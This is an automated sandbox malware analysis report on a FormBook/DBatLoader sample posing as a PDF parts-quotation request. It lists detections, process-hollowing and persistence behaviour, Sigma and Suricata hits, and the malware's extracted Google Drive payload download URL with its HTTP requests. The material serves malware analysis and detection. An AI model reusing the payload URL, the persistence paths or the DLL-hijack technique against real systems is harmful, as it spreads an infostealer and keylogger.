Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe

Overview

General Information

Sample name:RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
Analysis ID:1580362
MD5:aaca1b72e0ac5dc118b0f981667e8179
SHA1:162a85d0d2d6eec0fb05d043167bbd8451183735
SHA256:8a63bbd795519e52538e95891f205d78a4ccc474c24e80d8efab364ad4ca2335
Tags:exescruser-abuse_ch
Infos:

Detection

DBatLoader, FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
Yara detected FormBook
AI detected suspicious sample
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with a suspicious file extension
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe (PID: 7920 cmdline: "C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe" MD5: AACA1B72E0AC5DC118B0F981667E8179)
    • cmd.exe (PID: 8160 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • kmtqwssC.pif (PID: 7228 cmdline: C:\Users\Public\Libraries\kmtqwssC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Csswqtmk.PIF (PID: 6636 cmdline: "C:\Users\Public\Libraries\Csswqtmk.PIF" MD5: AACA1B72E0AC5DC118B0F981667E8179)
    • cmd.exe (PID: 7104 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • kmtqwssC.pif (PID: 7584 cmdline: C:\Users\Public\Libraries\kmtqwssC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • Csswqtmk.PIF (PID: 6624 cmdline: "C:\Users\Public\Libraries\Csswqtmk.PIF" MD5: AACA1B72E0AC5DC118B0F981667E8179)
    • cmd.exe (PID: 7588 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • kmtqwssC.pif (PID: 2260 cmdline: C:\Users\Public\Libraries\kmtqwssC.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://drive.google.com/uc?export=download&id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.2043784716.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000C.00000002.2013718675.0000000023100000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.1454887836.000000007FB80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
        00000010.00000002.2072619441.000000002FE90000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.1878165557.000000002CC40000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 10 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            12.2.kmtqwssC.pif.400000.3.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              16.2.kmtqwssC.pif.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                6.2.kmtqwssC.pif.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                  12.2.kmtqwssC.pif.400000.3.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                    16.2.kmtqwssC.pif.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                      Click to see the 4 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, ProcessId: 7920, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                      Sigma detected: Execution from Suspicious Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\kmtqwssC.pif, CommandLine: C:\Users\Public\Libraries\kmtqwssC.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\kmtqwssC.pif, NewProcessName: C:\Users\Public\Libraries\kmtqwssC.pif, OriginalFileName: C:\Users\Public\Libraries\kmtqwssC.pif, ParentCommandLine: "C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe", ParentImage: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, ParentProcessId: 7920, ParentProcessName: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, ProcessCommandLine: C:\Users\Public\Libraries\kmtqwssC.pif, ProcessId: 7228, ProcessName: kmtqwssC.pif
                      Sigma detected: Files With System Process Name In Unsuspected Locations
                      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, ProcessId: 7920, TargetFilename: C:\Windows \SysWOW64\svchost.exe
                      Sigma detected: New RUN Key Pointing to Suspicious Folder
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Csswqtmk.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, ProcessId: 7920, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Csswqtmk
                      Sigma detected: Parent in Public Folder Suspicious Process
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Csswqtmk.PIF" , ParentImage: C:\Users\Public\Libraries\Csswqtmk.PIF, ParentProcessId: 6636, ParentProcessName: Csswqtmk.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 7104, ProcessName: cmd.exe
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Csswqtmk.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, ProcessId: 7920, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Csswqtmk
                      Sigma detected: Execution of Suspicious File Type Extension
                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\kmtqwssC.pif, CommandLine: C:\Users\Public\Libraries\kmtqwssC.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\kmtqwssC.pif, NewProcessName: C:\Users\Public\Libraries\kmtqwssC.pif, OriginalFileName: C:\Users\Public\Libraries\kmtqwssC.pif, ParentCommandLine: "C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe", ParentImage: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, ParentProcessId: 7920, ParentProcessName: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, ProcessCommandLine: C:\Users\Public\Libraries\kmtqwssC.pif, ProcessId: 7228, ProcessName: kmtqwssC.pif

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-24T11:28:42.529127+010020283713Unknown Traffic192.168.2.1149705172.217.19.238443TCP
                      2024-12-24T11:28:45.321881+010020283713Unknown Traffic192.168.2.1149707142.250.181.1443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://drive.google.com/uc?export=download&id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6"]}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFReversingLabs: Detection: 65%
                      Multi AV Scanner detection for submitted file
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeReversingLabs: Detection: 65%
                      Yara detected FormBook
                      Source: Yara matchFile source: 12.2.kmtqwssC.pif.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.kmtqwssC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.kmtqwssC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.kmtqwssC.pif.400000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.kmtqwssC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.kmtqwssC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000010.00000002.2043784716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2013718675.0000000023100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2072619441.000000002FE90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1878165557.000000002CC40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.1977379900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeJoe Sandbox ML: detected
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.11:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.11:49707 version: TLS 1.2
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.0000000020790000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.00000000206E9000.00000004.00001000.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.0000000020732000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: kmtqwssC.pif, 00000006.00000002.1881572737.000000002CDA0000.00000040.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 00000006.00000003.1652551024.000000002CBF5000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000006.00000003.1642276952.000000002CA44000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000006.00000002.1881572737.000000002CF3E000.00000040.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000002.2016525244.00000000237AE000.00000040.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000002.2016525244.0000000023610000.00000040.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000003.1878066252.000000002345C000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000003.1873802180.00000000232AB000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000003.1972186536.000000002FD41000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2072781362.000000002FEF0000.00000040.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000003.1967570535.000000002FB9C000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2072781362.000000003008E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: kmtqwssC.pif, kmtqwssC.pif, 0000000C.00000002.2016525244.00000000237AE000.00000040.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000002.2016525244.0000000023610000.00000040.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000003.1878066252.000000002345C000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000003.1873802180.00000000232AB000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000003.1972186536.000000002FD41000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2072781362.000000002FEF0000.00000040.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000003.1967570535.000000002FB9C000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2072781362.000000003008E000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.0000000020790000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1395408495.00000000216A1000.00000004.00000020.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1395408495.0000000021672000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000003.1538761770.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.00000000206E9000.00000004.00001000.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.0000000020732000.00000004.00001000.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000003.1538761770.00000000006EE000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626132565.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626132565.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_029558B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,1_2_029558B4

                      Networking

                      barindex
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_0296E2F8 InternetCheckConnectionA,1_2_0296E2F8
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49707 -> 142.250.181.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.11:49705 -> 172.217.19.238:443
                      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.google.com
                      Source: global trafficHTTP traffic detected: GET /download?id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.google.com
                      Source: global trafficHTTP traffic detected: GET /download?id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com
                      Source: global trafficDNS traffic detected: DNS query: drive.google.com
                      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 